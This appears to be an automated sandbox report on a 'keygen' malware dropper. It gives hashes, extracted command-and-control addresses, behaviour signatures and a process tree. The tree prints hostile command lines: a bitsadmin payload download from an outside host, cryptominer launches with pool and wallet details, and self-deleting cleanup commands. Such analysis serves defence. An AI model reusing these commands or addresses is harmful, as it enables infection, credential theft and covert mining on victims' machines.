Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    1801s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-04-2021 13:38

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 60 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2592
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2568
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2488
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2304
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s BITS
          1⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3896
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:2140
        • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
          "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
          1⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3260
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
              3⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3952
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2248
            • C:\ProgramData\3239418.exe
              "C:\ProgramData\3239418.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:2792
              • C:\ProgramData\Windows Host\Windows Host.exe
                "C:\ProgramData\Windows Host\Windows Host.exe"
                4⤵
                • Executes dropped EXE
                PID:3952
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4120
            • C:\Users\Admin\AppData\Local\Temp\is-UMV6H.tmp\Install.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-UMV6H.tmp\Install.tmp" /SL5="$501E4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:4152
              • C:\Users\Admin\AppData\Local\Temp\is-5J80B.tmp\Ultra.exe
                "C:\Users\Admin\AppData\Local\Temp\is-5J80B.tmp\Ultra.exe" /S /UID=burnerch1
                4⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4244
                • C:\Program Files\Windows Security\TADMBRKVTW\ultramediaburner.exe
                  "C:\Program Files\Windows Security\TADMBRKVTW\ultramediaburner.exe" /VERYSILENT
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:4332
                  • C:\Users\Admin\AppData\Local\Temp\is-SQMVV.tmp\ultramediaburner.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-SQMVV.tmp\ultramediaburner.tmp" /SL5="$501E6,281924,62464,C:\Program Files\Windows Security\TADMBRKVTW\ultramediaburner.exe" /VERYSILENT
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:4372
                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                      7⤵
                      • Executes dropped EXE
                      PID:4456
                • C:\Users\Admin\AppData\Local\Temp\14-38362-2d2-dc8b7-7a76321151ba4\Janimiwaba.exe
                  "C:\Users\Admin\AppData\Local\Temp\14-38362-2d2-dc8b7-7a76321151ba4\Janimiwaba.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4404
                • C:\Users\Admin\AppData\Local\Temp\7c-9421e-7d3-1f9b4-6bae5b0dc352e\Daeqozhuduto.exe
                  "C:\Users\Admin\AppData\Local\Temp\7c-9421e-7d3-1f9b4-6bae5b0dc352e\Daeqozhuduto.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4480
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\35tdxvxp.a30\instEU.exe & exit
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5112
                    • C:\Users\Admin\AppData\Local\Temp\35tdxvxp.a30\instEU.exe
                      C:\Users\Admin\AppData\Local\Temp\35tdxvxp.a30\instEU.exe
                      7⤵
                        PID:1192
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aaruowul.mcc\gpooe.exe & exit
                      6⤵
                        PID:4176
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zitwaf4f.ke5\google-game.exe & exit
                        6⤵
                          PID:4464
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwv0agp2.ygr\md1_1eaf.exe & exit
                          6⤵
                            PID:4232
                            • C:\Users\Admin\AppData\Local\Temp\rwv0agp2.ygr\md1_1eaf.exe
                              C:\Users\Admin\AppData\Local\Temp\rwv0agp2.ygr\md1_1eaf.exe
                              7⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              PID:4504
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sroaie2n.d5f\y1.exe & exit
                            6⤵
                              PID:4280
                              • C:\Users\Admin\AppData\Local\Temp\sroaie2n.d5f\y1.exe
                                C:\Users\Admin\AppData\Local\Temp\sroaie2n.d5f\y1.exe
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5176
                                • C:\Users\Admin\AppData\Local\Temp\ggwsX2aBOu.exe
                                  "C:\Users\Admin\AppData\Local\Temp\ggwsX2aBOu.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:5568
                                  • C:\Users\Admin\AppData\Roaming\1619185559484.exe
                                    "C:\Users\Admin\AppData\Roaming\1619185559484.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619185559484.txt"
                                    9⤵
                                    • Executes dropped EXE
                                    PID:4164
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\ggwsX2aBOu.exe"
                                    9⤵
                                      PID:4768
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        10⤵
                                        • Runs ping.exe
                                        PID:2096
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\sroaie2n.d5f\y1.exe"
                                    8⤵
                                      PID:912
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        9⤵
                                        • Delays execution with timeout.exe
                                        PID:2612
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hifqfaoh.5n3\toolspab1.exe & exit
                                  6⤵
                                    PID:1752
                                    • C:\Users\Admin\AppData\Local\Temp\hifqfaoh.5n3\toolspab1.exe
                                      C:\Users\Admin\AppData\Local\Temp\hifqfaoh.5n3\toolspab1.exe
                                      7⤵
                                        PID:5260
                                        • C:\Users\Admin\AppData\Local\Temp\hifqfaoh.5n3\toolspab1.exe
                                          C:\Users\Admin\AppData\Local\Temp\hifqfaoh.5n3\toolspab1.exe
                                          8⤵
                                            PID:5560
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z13k4tpi.10e\SunLabsPlayer.exe /S & exit
                                        6⤵
                                          PID:5416
                                          • C:\Users\Admin\AppData\Local\Temp\z13k4tpi.10e\SunLabsPlayer.exe
                                            C:\Users\Admin\AppData\Local\Temp\z13k4tpi.10e\SunLabsPlayer.exe /S
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:6048
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                              8⤵
                                                PID:6008
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:5328
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:5700
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:2948
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4264
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4872
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:5152
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          8⤵
                                                          • Download via BitsAdmin
                                                          PID:1364
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pC2KRn2c9fiF7FlK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:912
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plg2ZLYGSphKc5Eq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5268
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5432
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                                PID:188
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5768
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:3088
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:3880
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5408
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      PID:4400
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                                                        9⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        PID:5220
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4232
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1388
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5216
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5804
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEF3A.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:1592
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              PID:5060
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzquv31f.cek\GcleanerWW.exe /mixone & exit
                                                                          6⤵
                                                                            PID:5656
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wgsk0zgm.hnn\inst.exe & exit
                                                                            6⤵
                                                                              PID:5816
                                                                              • C:\Users\Admin\AppData\Local\Temp\wgsk0zgm.hnn\inst.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\wgsk0zgm.hnn\inst.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5448
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\klxq21sl.i5k\c7ae36fa.exe & exit
                                                                              6⤵
                                                                                PID:5940
                                                                                • C:\Users\Admin\AppData\Local\Temp\klxq21sl.i5k\c7ae36fa.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\klxq21sl.i5k\c7ae36fa.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5804
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmyrgksb.0y5\app.exe /8-2222 & exit
                                                                                6⤵
                                                                                  PID:6136
                                                                                  • C:\Users\Admin\AppData\Local\Temp\cmyrgksb.0y5\app.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\cmyrgksb.0y5\app.exe /8-2222
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5596
                                                                                    • C:\Users\Admin\AppData\Local\Temp\cmyrgksb.0y5\app.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\cmyrgksb.0y5\app.exe" /8-2222
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:5052
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4568
                                                                          • C:\Users\Admin\AppData\Roaming\B06A.tmp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\B06A.tmp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4320
                                                                            • C:\Users\Admin\AppData\Roaming\B06A.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\B06A.tmp.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Checks processor information in registry
                                                                              PID:5092
                                                                          • C:\Users\Admin\AppData\Roaming\B4EF.tmp.exe
                                                                            "C:\Users\Admin\AppData\Roaming\B4EF.tmp.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:2316
                                                                            • C:\Windows\system32\msiexec.exe
                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3050@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                              4⤵
                                                                                PID:4292
                                                                              • C:\Windows\system32\msiexec.exe
                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w20326 --cpu-max-threads-hint 50 -r 9999
                                                                                4⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:5116
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                              3⤵
                                                                                PID:4152
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:4516
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Checks whether UAC is enabled
                                                                              PID:4828
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              PID:4700
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:2628
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:4672
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:5712
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:4352
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                            1⤵
                                                                              PID:1868
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                              1⤵
                                                                                PID:1436
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                1⤵
                                                                                  PID:1348
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                  1⤵
                                                                                    PID:1256
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                    1⤵
                                                                                      PID:1088
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                      1⤵
                                                                                      • Drops file in System32 directory
                                                                                      PID:948
                                                                                      • C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
